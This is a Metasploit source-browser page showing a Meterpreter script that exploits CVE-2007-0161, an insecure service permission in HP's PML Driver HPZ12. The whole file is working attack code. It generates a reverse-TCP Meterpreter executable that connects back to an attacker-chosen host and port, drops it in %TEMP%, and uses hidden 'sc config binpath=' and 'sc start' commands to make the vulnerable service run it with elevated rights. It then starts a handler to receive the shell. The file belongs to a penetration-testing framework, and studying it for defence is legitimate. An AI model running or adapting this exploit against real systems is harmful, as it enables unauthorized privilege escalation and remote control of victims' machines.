/scripts/meterpreter/pml_driver_config.rb - Annotate - Metasploit Framework - Metasploit Redmine Interface

root / scripts / meterpreter / pml_driver_config.rb @ master

History | View | Annotate | Download (3.2 kB)

1	0a6bb91c	James Lee	# $Id$
2	62c8c6ea	Joshua Drake	# $Revision$
3	fa14f1c5	Mario Ceballos	##
4	aebedfdb	HD Moore	# This file is part of the Metasploit Framework and may be subject to
5	fa14f1c5	Mario Ceballos	# redistribution and commercial restrictions. Please see the Metasploit
6	fa14f1c5	Mario Ceballos	# Framework web site for more information on licensing and terms of use.
7	3992eb7e	Joshua Drake	# http://metasploit.com/framework/
8	fa14f1c5	Mario Ceballos	##
9	fa14f1c5	Mario Ceballos
10	fa14f1c5	Mario Ceballos	##
11	fa14f1c5	Mario Ceballos	# HP Multiple Products PML Driver HPZ12 Local Privilege Escalation.
12	fa14f1c5	Mario Ceballos	#
13	fa14f1c5	Mario Ceballos	# This module exploits a privilege escalation vulnerability in
14	fa14f1c5	Mario Ceballos	# Hewlett-Packard's PML Driver HPZ12. Due to an insecure
15	fa14f1c5	Mario Ceballos	# SERVICE_CHANGE_CONFIG DACL permission, a local attacker can
16	fa14f1c5	Mario Ceballos	# gain elevated privileges.
17	fa14f1c5	Mario Ceballos	#
18	fa14f1c5	Mario Ceballos	# BID - 21935
19	fa14f1c5	Mario Ceballos	# CVE - 2007-0161
20	fa14f1c5	Mario Ceballos	# mc[@]metasploit.com
21	fa14f1c5	Mario Ceballos	##
22	fa14f1c5	Mario Ceballos
23	fa14f1c5	Mario Ceballos	#
24	fa14f1c5	Mario Ceballos	# Options
25	fa14f1c5	Mario Ceballos	#
26	fa14f1c5	Mario Ceballos	opts = Rex::Parser::Arguments.new(
27	50aa3046	James Lee	"-h" => [ false, "This help menu"],
28	50aa3046	James Lee	"-r" => [ true, "The IP of the system running Metasploit listening for the connect back"],
29	50aa3046	James Lee	"-p" => [ true, "The port on the remote host where Metasploit is listening"]
30	fa14f1c5	Mario Ceballos	)
31	fa14f1c5	Mario Ceballos
32	fa14f1c5	Mario Ceballos	#
33	fa14f1c5	Mario Ceballos	# Default parameters
34	fa14f1c5	Mario Ceballos	#
35	fa14f1c5	Mario Ceballos
36	fa14f1c5	Mario Ceballos	rhost = Rex::Socket.source_address("1.2.3.4")
37	fa14f1c5	Mario Ceballos	rport = 4444
38	fa14f1c5	Mario Ceballos
39	fa14f1c5	Mario Ceballos	#
40	fa14f1c5	Mario Ceballos	# Option parsing
41	fa14f1c5	Mario Ceballos	#
42	fa14f1c5	Mario Ceballos	opts.parse(args) do \|opt, idx, val\|
43	50aa3046	James Lee	case opt
44	50aa3046	James Lee	when "-h"
45	50aa3046	James Lee	print_status("HP PML Driver HPZ12 SERVICE_CHANGE_CONFIG privilege escalation.")
46	50aa3046	James Lee	print_line(opts.usage)
47	2ef31a70	Mario Ceballos	raise Rex::Script::Completed
48	50aa3046	James Lee	when "-r"
49	50aa3046	James Lee	rhost = val
50	50aa3046	James Lee	when "-p"
51	50aa3046	James Lee	rport = val.to_i
52	50aa3046	James Lee	end
53	fa14f1c5	Mario Ceballos	end
54	7d665e8a	Carlos Perez	if client.platform =~ /win32\|win64/
55	7d665e8a	Carlos Perez	client.sys.process.get_processes().each do \|m\|
56	7d665e8a	Carlos Perez	if ( m['name'] =~ /HPZipm12\.exe/ )
57	7d665e8a	Carlos Perez
58	7d665e8a	Carlos Perez	print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")
59	7d665e8a	Carlos Perez
60	7d665e8a	Carlos Perez	# Build out the exe payload.
61	7d665e8a	Carlos Perez	pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
62	7d665e8a	Carlos Perez	pay.datastore['LHOST'] = rhost
63	7d665e8a	Carlos Perez	pay.datastore['LPORT'] = rport
64	7d665e8a	Carlos Perez	raw = pay.generate
65	7d665e8a	Carlos Perez
66	7d665e8a	Carlos Perez	exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
67	7d665e8a	Carlos Perez
68	7d665e8a	Carlos Perez	# Place our newly created exe in %TEMP%
69	7d665e8a	Carlos Perez	tempdir = client.fs.file.expand_path("%TEMP%")
70	7d665e8a	Carlos Perez	tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
71	7d665e8a	Carlos Perez	print_status("Sending EXE payload '#{tempexe}'.")
72	7d665e8a	Carlos Perez	fd = client.fs.file.new(tempexe, "wb")
73	7d665e8a	Carlos Perez	fd.write(exe)
74	7d665e8a	Carlos Perez	fd.close
75	7d665e8a	Carlos Perez
76	7d665e8a	Carlos Perez	print_status("Stopping service \"Pml Driver HPZ12\"...")
77	7d665e8a	Carlos Perez	client.sys.process.execute("cmd.exe /c sc stop \"Pml Driver HPZ12\" ", nil, {'Hidden' => 'true'})
78	7d665e8a	Carlos Perez
79	7d665e8a	Carlos Perez	print_status("Setting Pml Driver to #{tempexe}...")
80	7d665e8a	Carlos Perez	client.sys.process.execute("cmd.exe /c sc config \"Pml Driver HPZ12\" binpath= #{tempexe}", nil, {'Hidden' => 'true'})
81	7d665e8a	Carlos Perez	sleep(1)
82	7d665e8a	Carlos Perez	print_status("Restarting the \"Pml Driver HPZ12\" service...")
83	7d665e8a	Carlos Perez	client.sys.process.execute("cmd.exe /c sc start \"Pml Driver HPZ12\" ", nil, {'Hidden' => 'true'})
84	7d665e8a	Carlos Perez
85	7d665e8a	Carlos Perez	# Our handler to recieve the callback.
86	7d665e8a	Carlos Perez	handler = client.framework.exploits.create("multi/handler")
87	7d665e8a	Carlos Perez	handler.datastore['WORKSPACE'] = client.workspace
88	7d665e8a	Carlos Perez	handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp"
89	7d665e8a	Carlos Perez	handler.datastore['LHOST'] = rhost
90	7d665e8a	Carlos Perez	handler.datastore['LPORT'] = rport
91	7d665e8a	Carlos Perez	handler.datastore['ExitOnSession'] = false
92	7d665e8a	Carlos Perez
93	7d665e8a	Carlos Perez	handler.exploit_simple(
94	7d665e8a	Carlos Perez	'Payload' => handler.datastore['PAYLOAD'],
95	7d665e8a	Carlos Perez	'RunAsJob' => true
96	7d665e8a	Carlos Perez	)
97	7d665e8a	Carlos Perez
98	7d665e8a	Carlos Perez	client.sys.process.execute("cmd.exe /c sc config \"Pml Driver HPZ12\" binpath= %SystemRoot%\\system32\\HPZipm12.exe", nil, {'Hidden' => 'true'})
99	7d665e8a	Carlos Perez
100	7d665e8a	Carlos Perez	end
101	fa14f1c5	Mario Ceballos	end
102	7d665e8a	Carlos Perez	else
103	7d665e8a	Carlos Perez	print_error("This version of Meterpreter is not supported with this Script!")
104	7d665e8a	Carlos Perez	raise Rex::Script::Completed
105	fa14f1c5	Mario Ceballos	end